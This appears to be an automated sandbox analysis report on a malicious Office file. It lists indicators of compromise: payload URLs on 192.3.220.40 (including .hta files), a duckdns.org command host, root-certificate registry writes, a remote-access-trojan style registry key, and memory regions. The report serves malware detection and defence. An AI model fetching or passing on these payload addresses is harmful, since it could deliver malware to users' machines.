https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid
150.136.81.248
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
http://192.3.220.40/
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFp
unknown
https://jfm.com.co/
unknown
http://192.3.220.40
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.imvu.com/sK
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://jfm.com.co/k3l?&alloy=handsome&c
unknown
http://geoplugin.net/json.gp0i
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://raw.githubusercontent.com
unknown
https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=oran
unknown
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htahttp://192.3.220.40/450/ec/networ
unknown
http://192.3.220.40/Q
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta...
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://192.3.220.40/450/seethebe
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 78 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
raw.githubusercontent.com
185.199.108.133
malicious
idabo.duckdns.org
135.148.195.248
malicious
geoplugin.net
178.237.33.50
jfm.com.co
150.136.81.248

IPs

IP
Domain
Country
Malicious
135.148.195.248
idabo.duckdns.org
United States
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands
malicious
192.3.220.40
unknown
United States
malicious
178.237.33.50
geoplugin.net
Netherlands
150.136.81.248
jfm.com.co
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
46/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A62E
2A62E
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7=/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33E29
33E29
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3405A
3405A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\349CC
349CC
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3405A
3405A
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Rmc-I89M3S
exepath
HKEY_CURRENT_USER\Software\Rmc-I89M3S
licence
HKEY_CURRENT_USER\Software\Rmc-I89M3S
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 84 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
22DE000
stack
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
12B3E000
trusted library allocation
page read and write
malicious
855000
heap
page read and write
malicious
551000
heap
page read and write
malicious
8B9000
heap
page read and write
malicious
871000
heap
page read and write
malicious
D0000
heap
page read and write
471000
heap
page read and write
3FB000
heap
page read and write
1C70000
heap
page read and write
12501000
trusted library allocation
page read and write
1CDAC000
trusted library section
page read and write
441B000
heap
page read and write
1CD09000
trusted library section
page read and write
1CEE0000
trusted library section
page read and write
1C2C1000
heap
page read and write
1AE76000
heap
page read and write
378000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
7FE89A47000
trusted library allocation
page read and write
3302000
heap
page read and write
3344000
heap
page read and write
1B325000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
2F0000
heap
page read and write
3390000
heap
page read and write
441B000
heap
page read and write
7FE89B85000
trusted library allocation
page read and write
F0F000
stack
page read and write
476000
heap
page read and write
24C000
heap
page read and write
2351000
trusted library allocation
page read and write
7FE89A32000
trusted library allocation
page read and write
1AB28000
heap
page read and write
4392000
heap
page read and write
2AA000
heap
page read and write
4B0000
heap
page read and write
23FB000
trusted library allocation
page read and write
3B70000
trusted library allocation
page read and write
4A22000
heap
page read and write
1CE12000
trusted library section
page read and write
27D4000
trusted library allocation
page read and write
4776000
heap
page read and write
3007000
heap
page read and write
1CE4000
heap
page read and write
46DB000
heap
page read and write
1BA0000
heap
page read and write
14B000
heap
page read and write
4A70000
heap
page read and write
1CE95000
trusted library section
page read and write
4E2000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
1AFB8000
stack
page read and write
32AB000
stack
page read and write
315A000
trusted library allocation
page read and write
4AD000
heap
page read and write
3388000
heap
page read and write
4A6A000
heap
page read and write
2F6000
heap
page read and write
2D5000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
4C1000
heap
page read and write
21ED000
trusted library allocation
page read and write
1A6A0000
heap
page read and write
7FE89872000
trusted library allocation
page read and write
2FFC000
heap
page read and write
4755000
heap
page read and write
1F0000
trusted library allocation
page read and write
336A000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
25D000
heap
page read and write
216000
heap
page read and write
43A000
heap
page read and write
47F0000
heap
page read and write
2F8C000
heap
page read and write
407000
heap
page read and write
2FD7000
heap
page read and write
425000
heap
page read and write
360F000
stack
page read and write
193000
stack
page read and write
456000
system
page execute and read and write
1A830000
heap
page execute and read and write
3A5D000
trusted library allocation
page read and write
37F000
heap
page read and write
175000
heap
page read and write
2450000
heap
page execute and read and write
4CF000
heap
page read and write
474000
remote allocation
page execute and read and write
33AF000
heap
page read and write
2769000
trusted library allocation
page read and write
3760000
trusted library allocation
page read and write
299000
heap
page read and write
33AF000
heap
page read and write
1AFCF000
stack
page read and write
1A2BF000
stack
page read and write
7FE89990000
trusted library allocation
page execute and read and write
3570000
heap
page read and write
2892000
trusted library allocation
page read and write
43AD000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
45E000
heap
page read and write
1E0000
heap
page read and write
580000
heap
page read and write
108000
heap
page read and write
326000
heap
page read and write
339B000
heap
page read and write
7FE89A74000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
130000
heap
page read and write
1C16000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
4BE000
heap
page read and write
4394000
heap
page read and write
802000
heap
page read and write
1AD41000
heap
page read and write
10000
heap
page read and write
1DD0000
direct allocation
page read and write
484000
heap
page read and write
22B000
stack
page read and write
1CFF3000
trusted library section
page read and write
12501000
trusted library allocation
page read and write
2FDA000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
39E000
heap
page read and write
1CEDE000
trusted library section
page read and write
2425000
heap
page read and write
1AF3F000
stack
page read and write
20CF000
stack
page read and write
7FE89B80000
trusted library allocation
page read and write
2EE000
stack
page read and write
3B80000
trusted library allocation
page read and write
3A89000
trusted library allocation
page read and write
54C000
heap
page read and write
295000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
3344000
heap
page read and write
3940000
trusted library allocation
page read and write
1D014000
trusted library section
page read and write
108000
heap
page read and write
1C491000
heap
page read and write
2B0000
heap
page read and write
453A000
heap
page read and write
3B60000
trusted library allocation
page read and write
1CD03000
trusted library section
page read and write
3B6F000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
28F0000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
53A000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
20000
heap
page read and write
7C5000
heap
page read and write
1AB09000
heap
page read and write
4341000
heap
page read and write
2B4000
heap
page read and write
4396000
heap
page read and write
2A3C000
stack
page read and write
1C3C8000
heap
page read and write
32D9000
heap
page read and write
2DB000
heap
page read and write
1A7FE000
stack
page read and write
343000
heap
page read and write
1C3F0000
heap
page read and write
1A6BE000
stack
page read and write
1A74E000
heap
page execute and read and write
43F000
heap
page read and write
2772000
trusted library allocation
page read and write
1D80000
direct allocation
page read and write
34F000
heap
page read and write
815000
heap
page read and write
4611000
heap
page read and write
350000
trusted library allocation
page read and write
4778000
heap
page read and write
10000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
2FD5000
heap
page read and write
1AB1C000
heap
page read and write
5AA000
heap
page read and write
1CCE0000
trusted library section
page read and write
4532000
heap
page read and write
1B2C0000
heap
page read and write
33AF000
heap
page read and write
1AAFD000
heap
page read and write
2EC0000
trusted library allocation
page read and write
4EC5000
heap
page read and write
4778000
heap
page read and write
1A6CC000
stack
page read and write
1260D000
trusted library allocation
page read and write
69D000
heap
page read and write
3A89000
trusted library allocation
page read and write
7FE898A3000
trusted library allocation
page read and write
4168000
heap
page read and write
F70000
heap
page read and write
4EB000
heap
page read and write
1C89E000
stack
page read and write
1C7B0000
heap
page read and write
47A5000
heap
page read and write
1B320000
heap
page read and write
524000
heap
page read and write
1A79F000
stack
page read and write
453C000
heap
page read and write
3700000
trusted library allocation
page read and write
1CEE8000
trusted library section
page read and write
3EDF000
stack
page read and write
439D000
heap
page read and write
41C000
heap
page read and write
120E0000
trusted library allocation
page read and write
4160000
heap
page read and write
2763000
trusted library allocation
page read and write
2300000
heap
page read and write
539000
heap
page read and write
4B0000
heap
page read and write
2A3000
heap
page read and write
2C9000
heap
page read and write
268000
stack
page read and write
3A46000
trusted library allocation
page read and write
1CE53000
trusted library section
page read and write
400000
heap
page read and write
2FD5000
heap
page read and write
3379000
heap
page read and write
3A5D000
trusted library allocation
page read and write
1AF2E000
stack
page read and write
43AF000
heap
page read and write
2DB7000
trusted library allocation
page read and write
1C356000
heap
page read and write
46CA000
heap
page read and write
249000
heap
page read and write
53C000
heap
page read and write
2791000
trusted library allocation
page read and write
3A8F000
trusted library allocation
page read and write
2DFE000
stack
page read and write
14B000
heap
page read and write
37C000
heap
page read and write
1CEE4000
trusted library section
page read and write
7FE89C00000
trusted library allocation
page read and write
1CCA8000
trusted library section
page read and write
2D10000
trusted library allocation
page read and write
1B096000
heap
page read and write
39EE000
stack
page read and write
532000
heap
page read and write
1AC73000
heap
page read and write
3A9E000
stack
page read and write
1CE04000
trusted library section
page read and write
3A8F000
trusted library allocation
page read and write
1AB43000
heap
page read and write
23F7000
trusted library allocation
page read and write
9D0000
heap
page read and write
4B8000
heap
page read and write
270F000
stack
page read and write
7FE89A47000
trusted library allocation
page read and write
3BF000
heap
page read and write
7FE89946000
trusted library allocation
page read and write
1CFE1000
trusted library section
page read and write
168000
heap
page read and write
2A2000
heap
page read and write
433000
heap
page read and write
1D004000
trusted library section
page read and write
1ACF5000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
4A3E000
heap
page read and write
25B0000
trusted library allocation
page read and write
3E5000
heap
page read and write
4037000
heap
page read and write
590000
heap
page read and write
1CF99000
trusted library section
page read and write
2765000
trusted library allocation
page read and write
400000
system
page execute and read and write
476E000
heap
page read and write
1D012000
trusted library section
page read and write
4FF000
heap
page read and write
348E000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
1CF0000
heap
page read and write
46DB000
heap
page read and write
4400000
heap
page read and write
340000
heap
page read and write
4776000
heap
page read and write
47A1000
heap
page read and write
4A6A000
heap
page read and write
2A04000
trusted library allocation
page read and write
3D60000
trusted library allocation
page read and write
3D0000
heap
page read and write
1D045000
trusted library section
page read and write
4A6A000
heap
page read and write
279E000
trusted library allocation
page read and write
45B000
heap
page read and write
124000
heap
page read and write
8B1000
heap
page read and write
1C980000
heap
page read and write
1D00000
direct allocation
page read and write
53B000
heap
page read and write
4B7000
heap
page read and write
2B4000
heap
page read and write
7FE89A23000
trusted library allocation
page read and write
3344000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
47F0000
heap
page read and write
1AAE4000
heap
page read and write
229000
heap
page read and write
3A7D000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
1AD53000
heap
page read and write
290000
heap
page read and write
32D9000
heap
page read and write
470F000
heap
page read and write
1C79C000
stack
page read and write
52A000
heap
page read and write
3D60000
trusted library allocation
page read and write
2F2C000
heap
page read and write
25B000
heap
page read and write
3315000
heap
page read and write
4771000
heap
page read and write
3CA000
heap
page read and write
4166000
heap
page read and write
34B000
heap
page read and write
1F60000
heap
page execute and read and write
7FE89A53000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
477E000
heap
page read and write
535000
heap
page read and write
2789000
trusted library allocation
page read and write
440000
heap
page read and write
22FF000
stack
page read and write
5C0000
trusted library allocation
page execute read
59E000
heap
page read and write
1EE6000
heap
page read and write
23E8000
trusted library allocation
page read and write
27D000
heap
page read and write
3A7D000
trusted library allocation
page read and write
23FA000
trusted library allocation
page read and write
184000
heap
page read and write
34B0000
heap
page read and write
470F000
heap
page read and write
4A34000
heap
page read and write
3B0000
trusted library allocation
page read and write
4776000
heap
page read and write
4A67000
heap
page read and write
34CA000
stack
page read and write
510000
heap
page read and write
181000
heap
page read and write
3C0000
heap
page read and write
32C000
stack
page read and write
1ABDF000
stack
page read and write
3990000
trusted library allocation
page read and write
1C2CF000
heap
page read and write
73E000
stack
page read and write
4E8000
heap
page read and write
33AF000
heap
page read and write
10000
heap
page read and write
477B000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
12291000
trusted library allocation
page read and write
439D000
heap
page read and write
1AAF2000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
52D000
heap
page read and write
2380000
heap
page read and write
7FE89A98000
trusted library allocation
page read and write
1B35B000
heap
page read and write
4714000
heap
page read and write
18C000
heap
page read and write
1AC80000
heap
page read and write
580000
heap
page read and write
3A5D000
trusted library allocation
page read and write
1BE000
heap
page read and write
228F000
stack
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1C488000
heap
page read and write
21B1000
trusted library allocation
page read and write
3E0000
heap
page read and write
7FE89C44000
trusted library allocation
page read and write
4757000
heap
page read and write
1B535000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
278F000
trusted library allocation
page read and write
453D000
heap
page read and write
4A70000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
7FE89C00000
trusted library allocation
page read and write
2794000
trusted library allocation
page read and write
4389000
heap
page read and write
7FE89893000
trusted library allocation
page execute and read and write
2B4000
heap
page read and write
477F000
heap
page read and write
224E000
stack
page read and write | page guard
1B38B000
heap
page read and write
3F6000
heap
page read and write
1296E000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
2AB000
heap
page read and write
152000
heap
page read and write
1B329000
heap
page read and write
737000
heap
page read and write
378000
heap
page read and write
2BF000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
4A65000
heap
page read and write
1A30F000
stack
page read and write
41E000
heap
page read and write
279B000
trusted library allocation
page read and write
1C6B0000
heap
page read and write
1CF69000
trusted library section
page read and write
1C670000
heap
page read and write
3A7D000
trusted library allocation
page read and write
40E000
heap
page read and write
260000
trusted library allocation
page read and write
5FD000
stack
page read and write
4860000
heap
page read and write
3A5D000
trusted library allocation
page read and write
1CE8B000
trusted library section
page read and write
37A4000
heap
page read and write
46C2000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
7FE89B65000
trusted library allocation
page read and write
7FE898B3000
trusted library allocation
page read and write
1CFDA000
trusted library section
page read and write
1CE2B000
trusted library section
page read and write
21F2000
trusted library allocation
page read and write
3B20000
heap
page read and write
4861000
heap
page read and write
4A70000
heap
page read and write
23F6000
trusted library allocation
page read and write
1D00C000
trusted library section
page read and write
11F000
heap
page read and write
3007000
heap
page read and write
5A5000
heap
page read and write
2B4000
heap
page read and write
564000
heap
page read and write
3A5D000
trusted library allocation
page read and write
43AB000
heap
page read and write
25E000
heap
page read and write
130000
heap
page read and write
4164000
heap
page read and write
91E000
heap
page read and write
59E000
heap
page read and write
11A000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
3E000
heap
page read and write
4058000
heap
page read and write
2795000
trusted library allocation
page read and write
837000
heap
page read and write
1CA0F000
stack
page read and write
1A838000
heap
page execute and read and write
1AA80000
heap
page read and write
1ABEB000
heap
page read and write
10000
heap
page read and write
140000
trusted library allocation
page read and write
2EAE000
stack
page read and write
2A00000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
2D5000
heap
page read and write
12A4E000
trusted library allocation
page read and write
32D4000
heap
page read and write
3E0000
heap
page read and write
4A67000
heap
page read and write
21F0000
trusted library allocation
page read and write
3A8F000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
479C000
heap
page read and write
446F000
heap
page read and write
4A3B000
heap
page read and write
1B2DB000
stack
page read and write
533000
heap
page read and write
3498000
trusted library allocation
page read and write
2B4000
heap
page read and write
453E000
heap
page read and write
2E4000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
2CF000
heap
page read and write
3F0000
heap
page read and write
3A5D000
trusted library allocation
page read and write
370000
heap
page read and write
1CE7D000
trusted library section
page read and write
17F000
trusted library allocation
page read and write
342000
heap
page read and write
1A799000
stack
page read and write
1CE99000
trusted library section
page read and write
20D1000
trusted library allocation
page read and write
3413000
direct allocation
page read and write
10000
heap
page read and write
3A5D000
trusted library allocation
page read and write
7FE89A42000
trusted library allocation
page read and write
7FE89976000
trusted library allocation
page execute and read and write
453E000
heap
page read and write
3A94000
trusted library allocation
page read and write
2C3000
heap
page read and write
440000
heap
page read and write
1CE66000
trusted library section
page read and write
4A70000
heap
page read and write
1CCF1000
trusted library section
page read and write
10000
heap
page read and write
47A1000
heap
page read and write
21E6000
trusted library allocation
page read and write
1C2FB000
heap
page read and write
4392000
heap
page read and write
1AAB9000
heap
page read and write
3006000
heap
page read and write
124D1000
trusted library allocation
page read and write
1CE27000
trusted library section
page read and write
7A0000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4A68000
heap
page read and write
1F10000
heap
page read and write
46C1000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
23A1000
heap
page read and write
3B74000
trusted library allocation
page read and write
4A63000
heap
page read and write
21EF000
trusted library allocation
page read and write
1CFF1000
trusted library section
page read and write
3F76000
heap
page read and write
7FE89894000
trusted library allocation
page read and write
26EE000
stack
page read and write
124E1000
trusted library allocation
page read and write
1CFEF000
trusted library section
page read and write
1C2F2000
heap
page read and write
1D006000
trusted library section
page read and write
2B4000
heap
page read and write
7FE898A4000
trusted library allocation
page read and write
5AA000
heap
page read and write
23FA000
trusted library allocation
page read and write
1CB3F000
stack
page read and write
2D5000
heap
page read and write
5D0000
heap
page read and write
1CD77000
trusted library section
page read and write
45A0000
heap
page read and write
280000
heap
page read and write
33AA000
heap
page read and write
7FE89BF1000
trusted library allocation
page read and write
4470000
heap
page read and write
1B4EB000
heap
page read and write
1C459000
heap
page read and write
3FF000
trusted library allocation
page read and write
1EF0000
direct allocation
page read and write
2136000
heap
page read and write
1DC0000
heap
page read and write
21F6000
trusted library allocation
page read and write
4A07000
heap
page read and write
3A94000
trusted library allocation
page read and write
23F4000
trusted library allocation
page read and write
3302000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
7FE89A98000
trusted library allocation
page read and write
1A234000
heap
page read and write
1C0000
trusted library allocation
page read and write
D5D000
stack
page read and write
21E5000
trusted library allocation
page read and write
46C1000
heap
page read and write
1C2ED000
heap
page read and write
1AD72000
heap
page read and write
4778000
heap
page read and write
338B000
heap
page read and write
2AF000
heap
page read and write
4A67000
heap
page read and write
6BE000
stack
page read and write
3FD000
heap
page read and write
265000
